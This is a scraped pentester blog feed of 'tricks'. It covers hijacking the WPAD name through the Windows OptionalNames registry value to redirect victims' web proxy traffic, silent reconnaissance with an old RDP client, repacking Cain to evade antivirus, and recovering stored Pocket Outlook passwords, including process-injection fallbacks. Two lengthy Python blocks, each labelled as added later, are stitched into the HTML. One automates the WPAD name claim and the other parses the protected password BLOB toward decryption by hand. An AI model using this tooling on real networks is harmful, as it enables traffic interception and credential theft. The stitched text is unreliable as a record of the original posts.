/><ul><li>packet.dll</li><li>wanpacket.dll</li><li>wpcap.dll</li></ul>Note#1: without the Winpcap driver, Cain will load but will lack network features like password sniffing and ARP poisoning.<br /><br />To make Cain undetected by most (if not all) antivirus software, the executable must be "repacked". 
However, this is another story :)<br /><br />Note#2: Cain still requires administrative rights on the compromised host.newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com4tag:blogger.com,1999:blog-26480225.post-49547018250367624422008-02-20T07:18:00.002+01:002008-02-22T22:40:32.358+01:00Pentester trick #2: faking NetBIOS names<span style="font-weight: bold;font-size:130%;" >Trick #2: faking NetBIOS names</span><br /><br />There was quite a buzz at BlackHat US 2007 around the <a href="https://www.blackhat.com/presentations/bh-usa-07/Moore_and_Valsmith/Presentation/bh-usa-07-moore_and_valsmith.pdf">H.D. Moore + Valsmith attack</a> against Internet Explorer's proxy auto-configuration feature.<br /><br />To sum up: if anything on the network answers to the name "WPAD", Internet Explorer will consider it the enterprise web proxy (it fetches its proxy script from http://wpad/wpad.dat).<br /><br />The original attack is based on the "Dynamic DNS Update" feature of Windows DNS servers. DNS updates can be:<br /><ul><li>DNS-based, unauthenticated. Game over.</li><li>DNS-based, authenticated. Nice try, but since any domain user can create up to <a href="http://support.microsoft.com/kb/243327">10 computer accounts</a> in Active Directory, it is quite easy to name a computer "WPAD", join it to the domain and authenticate.<br /></li><li>DHCP-based. Game over, too: the DNS server will blindly trust the host name supplied by the DHCP client.<br /></li></ul>Ok, but what if the "Dynamic DNS Update" feature has been disabled? Or if you need to quickly register names? 
Joining a new computer to the domain is <span style="font-style: italic;">not an option</span> in this case.<br /><br />Fortunately, everybody who has sniffed a Windows network for more than 5 minutes knows that most Windows clients "in the wild" use a weak name resolution setup: when DNS fails, they fall back to NBNS (<a href="http://en.wikipedia.org/wiki/NBNS">NetBIOS Name Service</a>) broadcasts.<br /><br />So how can you take advantage of a broadcast NBNS request for "WPAD" (or anything else) to redirect the target's traffic?<br /><br />One solution would be to use the <a href="http://honeynet.rstack.org/tools.php">FakeNetBIOS</a> tools, but they rely on raw sockets, which have been crippled on Windows XP SP2. Another would be to use <a href="http://www.secdev.org/projects/scapy/">Scapy</a> as an NBNS responder, but the Windows port is not mature yet :)<br /><br />As usual, the best solution is to rely on Windows built-in mechanisms to solve the puzzle.<br /><br />Under <a href="http://www.jsifaq.com/SF/Tips/Tip.aspx?id=0062"><b>HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters</b></a>, there is a value of type REG_MULTI_SZ called <b>OptionalNames</b>.<br /><br />Any name put in there is registered by the local computer's Server service, which will then answer NBNS queries for that name (the value is only read when the service starts). 
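Here is an added example, not part of the original post, that writes the value and, once the Server service has been restarted as described next, lets you verify from a second host on the same broadcast domain that the name is actually answered over NBNS. Assumptions: Python 3 with the standard library only; the registry function is Windows-only and needs administrative rights; which name suffixes (0x00 workstation, 0x20 server) the Server service registers for OptionalNames is not stated in the post, so the resolver tries both.

```python
"""Claim extra NetBIOS names through LanmanServer's OptionalNames, then check
from another host on the same broadcast domain that the name is answered.
Added example, not from the original post. Standard library only (Python 3)."""
import socket
import struct
import sys

OPTIONAL_NAMES_KEY = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"


def merge_optional_names(existing, wanted):
    """Build the REG_MULTI_SZ list: old entries plus new ones, upper-cased,
    de-duplicated, each at most 15 characters (the NetBIOS name limit)."""
    merged = []
    for name in list(existing) + list(wanted):
        name = name.strip().upper()
        if not name or len(name) > 15:
            raise ValueError("invalid NetBIOS name: %r" % name)
        if name not in merged:
            merged.append(name)
    return merged


def set_optional_names(wanted):
    """Write OptionalNames under HKLM (Windows only, needs administrative
    rights). The Server service reads it at start-up, so restart it afterwards:
    net stop lanmanserver && net start lanmanserver."""
    if sys.platform != "win32":
        raise RuntimeError("the registry write only makes sense on Windows")
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, OPTIONAL_NAMES_KEY, 0,
                        winreg.KEY_READ | winreg.KEY_WRITE) as key:
        try:
            existing, _ = winreg.QueryValueEx(key, "OptionalNames")
        except FileNotFoundError:
            existing = []
        names = merge_optional_names(existing, wanted)
        winreg.SetValueEx(key, "OptionalNames", 0, winreg.REG_MULTI_SZ, names)
    return names


def nb_encode(name, suffix=0x00):
    """RFC 1001 first-level encoding: pad to 15 bytes, append the suffix byte,
    then write each byte as two nibbles offset by 'A', as one 32-byte label."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    label = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return b"\x20" + label + b"\x00"


def nb_decode(label):
    """Inverse of nb_encode(); returns (name, suffix) from the 34-byte label."""
    enc = label[1:33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def nbns_query(name, txid, suffix=0x00):
    """NBNS name query: flags 0x0110 = recursion desired + broadcast, one
    question of type NB (0x20), class IN."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + nb_encode(name, suffix) + struct.pack(">HH", 0x0020, 0x0001)


def parse_nbns_response(data, txid):
    """Return the IPv4 addresses carried by a positive name query response to
    our transaction id, or [] for anything else (wrong id, error RCODE, ...)."""
    if len(data) < 12 + 34 + 10:
        return []
    rtxid, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if rtxid != txid or not flags & 0x8000 or flags & 0x000F or ancount < 1:
        return []
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[46:56])
    if rtype != 0x0020:
        return []
    rdata = data[56:56 + rdlen]
    # each entry is NB_FLAGS (2 bytes) followed by an IPv4 address
    return [socket.inet_ntoa(rdata[i + 2:i + 6]) for i in range(0, len(rdata) - 5, 6)]


def resolve(name, broadcast="255.255.255.255", timeout=2.0):
    """Ask the broadcast domain who owns NAME. Which suffixes the Server
    service registers for OptionalNames is an assumption here, so both
    0x00 (workstation) and 0x20 (server) are tried; returns (suffix, ips)."""
    for suffix in (0x00, 0x20):
        txid = 0x4E42 + suffix
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
            sock.settimeout(timeout)
            sock.sendto(nbns_query(name, txid, suffix), (broadcast, 137))
            try:
                data, _peer = sock.recvfrom(512)
            except socket.timeout:
                continue
        ips = parse_nbns_response(data, txid)
        if ips:
            return suffix, ips
    return None
```

merge_optional_names() is kept separate so the name validation (15-character limit, upper case, no duplicates) can be exercised anywhere; on the target, set_optional_names(["WPAD"]) followed by the service restart below does the job, and resolve("WPAD") run from any other host on the segment shows which suffix answered and with which address.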
Then restart the Server service so that it re-registers its names:<br /><br /><span style="font-weight: bold;">net stop lanmanserver</span><br /><span style="font-weight: bold;">net start lanmanserver</span><br /><br />Job done!newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-83197089977032771772008-02-20T07:10:00.004+01:002008-02-20T10:28:18.864+01:00Pentester trick #1: using RDP Client 5 on Vista<a href="http://nonop.blogspot.com/">Nonop</a>'s recent <a href="http://nonop.blogspot.com/2008/02/kit-du-pentester.html">post</a> on the pentester's essentials was inspiring enough for me to get back on-line, on this long-abandoned blog.<br /><br />So here is the first post of a (hopefully long) series about pentester tricks, from my very own field experience. Enjoy!<br /><br /><span style="font-weight: bold;font-size:130%;" >Trick #1: using RDP Client 5 on Vista</span><br /><br />RDP Client 5 has a great advantage over RDP Client 6: it connects to the remote target without sending any credential first, so the pentester can see the server version, computer name and trusted domains (as shown on the logon screen) without leaving any track in the security audit trail.<br /><br />However RDP Client 6 was pushed through Windows Update quite a while ago, and is required in some cases (like Windows Vista/2008 Remote Desktop with full security options ... which are recommended given the flaws found in <a href="http://www.oxid.it/downloads/rdp-gbu.pdf">previous versions of the RDP protocol</a>).<br /><br />Fortunately, it is quite easy to make both clients live together. RDP Client 5 consists of only two binaries: MSTSC.EXE and MSTSCAX.DLL. The trick is to copy both files into a directory of their own, and to create an empty MSTSC.EXE.LOCAL file in that same directory. 
This will force MSTSC.EXE to load its libraries from its own directory instead of the system directory (DLL redirection through a <span style="font-family:courier new;">.local</span> file, see the references below).<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/rdp.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/rdp.png" alt="" border="0" /></a><br />References: [<a href="http://msdn2.microsoft.com/en-us/library/ms682600.aspx">1</a>] [<a href="http://msdn2.microsoft.com/en-us/library/ms811694.aspx">2</a>]newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-1150990250362919592006-06-22T16:25:00.000+01:002006-11-14T21:05:07.331+01:00<h1>Recovering Pocket Outlook passwords, part 2</h1><h2>Having a BLOB</h2>Now, it is time to recover the password from the protected BLOB. The first step is to get a valid BLOB; we do that by setting breakpoints just before and just after CryptProtectData(), and dumping the DATA_BLOB structure passed as its output parameter.<br /><br /><span style="font-style: italic;">Before:</span><br /><br /><span style=";font-family:courier new;font-size:85%;" >BLOB = {<br />size=0x0A (10)<br />data=L"toto"<br />}</span><br /><br /><span style="font-style: italic;">After:</span><br /><br /><span style=";font-family:courier new;font-size:85%;" >BLOB = {<br />size=0x7E (126)<br />data=<br />00075C40 DCD 1<br />00075C44 DCD 0<br />00075C48 DCD 0<br />00075C4C DCD 0<br />00075C50 DCD 0<br />00075C54 DCD 0x20000000<br />00075C58 DCD 0<br />00075C5C DCD 0x6801<br />00075C60 DCD 0x10<br />00075C64 DCD 0x10<br />00075C68 DCD 0xFD7C53C<br />00075C6C DCD 0x5CD8C0A3<br />00075C70 DCD 0x7A39FA3F<br />00075C74 DCD 0xDA8959BD<br />00075C78 DCD 0<br />00075C7C DCD 0x8004<br />00075C80 DCD 0x10<br />00075C84 DCD 0x10<br />00075C88 DCD 0x65412C18<br />00075C8C DCD 0x6EDAE82<br />00075C90 DCD 0xE76ADC3<br />00075C94 DCD 0xC909937A<br />00075C98 DCD 0xA<br />00075C9C DCD 0x720053C6<br />00075CA0 DCD 0x6CD865A4<br />00075CA4 DCD 
0x14C609<br />00075CA8 DCD 0xD5870000<br />00075CAC DCD 0x87F4EAE5<br />00075CB0 DCD 0xCBB1CE52<br />00075CB4 DCD 0x19CDF0BB<br />00075CB8 DCD 0xCC3F1E90<br />00075CBC DCD 0xCB6D</span> <h2>Finding the password store</h2>Since passwords survive a reboot, this BLOB has to be stored somewhere in persistent storage. Under Windows CE 4.2, the most common way to do this is to use a database.<br /><br />Having a look at the system databases (using <a href="http://www.tucows.com/Windows/PDA/WindowsCE/PIM/DatabaseTools/">HPC Database Viewer</a> for example), we quickly find that the BLOB is stored in the "pMailFolders" database, with property identifier #0x8304.<br /><h2>Getting the password back</h2>There are several steps to retrieve a cleartext password:<br /><ul><li>Getting the BLOB out of the database;</li><li>Calling CryptUnprotectData() correctly.</li></ul>Let's write a little <a href="http://newsoft.dyndns.org/blog/GetPassword-free.zip">piece of code</a> that does both. Surprisingly, it works out of the box! That means that the CRYPTPROTECT_SYSTEM flag (which should restrict decryption to trusted applications) is not enforced by the kernel in my case!<br /><br />In case CryptUnprotectData() fails, here are some tricks that could work:<br /><ul><li>Calling COREDLL!SetProcPermissions(-1);</li><li>The traditional WriteProcessMemory()/CreateRemoteThread() combination, to run the call inside a trusted process;</li><li>Understanding the CryptoAPI BLOB format, for decryption by hand.</li></ul>If you want to know more ... just send me PDAs :)<br /><br /><span style="font-style: italic;">Greets: mao from <a href="http://www.oxid.it/">oxid.it</a></span> newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0
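For the last item, here is an added example (my code, not from the original post) that rebuilds the 0x7E-byte BLOB from the dump above and splits it into fields. The layout is my reading of this particular dump, modelled on the desktop DPAPI blob but without the master-key fields, so treat it as an assumption. It does account for every byte, though, and it explains the constants in the dump: 0x20000000 is CRYPTPROTECT_SYSTEM, 0x6801 is CALG_RC4, 0x8004 is CALG_SHA1, and the 10-byte payload is exactly the size of L"toto" including its terminator, as in the input BLOB.

```python
import struct

# Constants from wincrypt.h
CRYPTPROTECT_SYSTEM = 0x20000000
CALG_RC4 = 0x6801
CALG_SHA1 = 0x8004

# The 126-byte output BLOB as dumped in the post (31 DWORDs plus one trailing
# WORD), rebuilt here in little-endian byte order.
_DWORDS = [
    0x1, 0x0, 0x0, 0x0, 0x0, 0x20000000, 0x0, 0x6801, 0x10, 0x10,
    0xFD7C53C, 0x5CD8C0A3, 0x7A39FA3F, 0xDA8959BD, 0x0, 0x8004, 0x10, 0x10,
    0x65412C18, 0x6EDAE82, 0xE76ADC3, 0xC909937A, 0xA,
    0x720053C6, 0x6CD865A4, 0x14C609, 0xD5870000, 0x87F4EAE5, 0xCBB1CE52,
    0x19CDF0BB, 0xCC3F1E90,
]
PROTECTED_BLOB = struct.pack("<%dI" % len(_DWORDS), *_DWORDS) + struct.pack("<H", 0xCB6D)


def parse_ce_protected_blob(blob):
    """Split a Windows CE CryptProtectData() output into its fields.

    Layout (assumed from the dump in the post): version, provider GUID, flags,
    description, crypt algorithm and key length, salt, HMAC key, hash algorithm
    and length, second HMAC key, ciphertext, signature. Every variable-length
    part is preceded by its byte length; each length is checked against the
    blob size so a truncated or corrupted blob raises instead of mis-parsing.
    """
    pos = 0

    def u32():
        nonlocal pos
        if pos + 4 > len(blob):
            raise ValueError("truncated blob at offset %d" % pos)
        value, = struct.unpack_from("<I", blob, pos)
        pos += 4
        return value

    def take(n):
        nonlocal pos
        if pos + n > len(blob):
            raise ValueError("length %d at offset %d exceeds blob" % (n, pos))
        chunk = blob[pos:pos + n]
        pos += n
        return chunk

    fields = {}
    fields["version"] = u32()
    fields["provider_guid"] = take(16)
    fields["flags"] = u32()
    fields["description"] = take(u32())      # UTF-16 string, empty here
    fields["alg_crypt"] = u32()
    fields["alg_crypt_len"] = u32()
    fields["salt"] = take(u32())
    fields["hmac_key"] = take(u32())         # empty in this blob
    fields["alg_hash"] = u32()
    fields["alg_hash_len"] = u32()
    fields["hmac2_key"] = take(u32())
    fields["data"] = take(u32())             # the ciphertext
    fields["sign"] = take(u32())             # 20 bytes, SHA1-sized
    if pos != len(blob):
        raise ValueError("%d trailing bytes" % (len(blob) - pos))
    return fields


def describe(fields):
    """Human-readable summary of the parsed fields."""
    alg = {CALG_RC4: "CALG_RC4", CALG_SHA1: "CALG_SHA1"}
    return {
        "system_only": bool(fields["flags"] & CRYPTPROTECT_SYSTEM),
        "cipher": alg.get(fields["alg_crypt"], hex(fields["alg_crypt"])),
        "hash": alg.get(fields["alg_hash"], hex(fields["alg_hash"])),
        "ciphertext_len": len(fields["data"]),
        "signature_len": len(fields["sign"]),
    }


if __name__ == "__main__":
    parsed = parse_ce_protected_blob(PROTECTED_BLOB)
    for key, value in describe(parsed).items():
        print("%-15s %s" % (key, value))
    print("ciphertext      %s" % parsed["data"].hex())
```

Walking the blob this way is the first half of "decryption by hand": it isolates the salt, the second HMAC key and the 10 ciphertext bytes that an RC4 key derived from the device secret would have to be applied to, and it shows that the flags word carries CRYPTPROTECT_SYSTEM, which is the flag the post found not to be enforced.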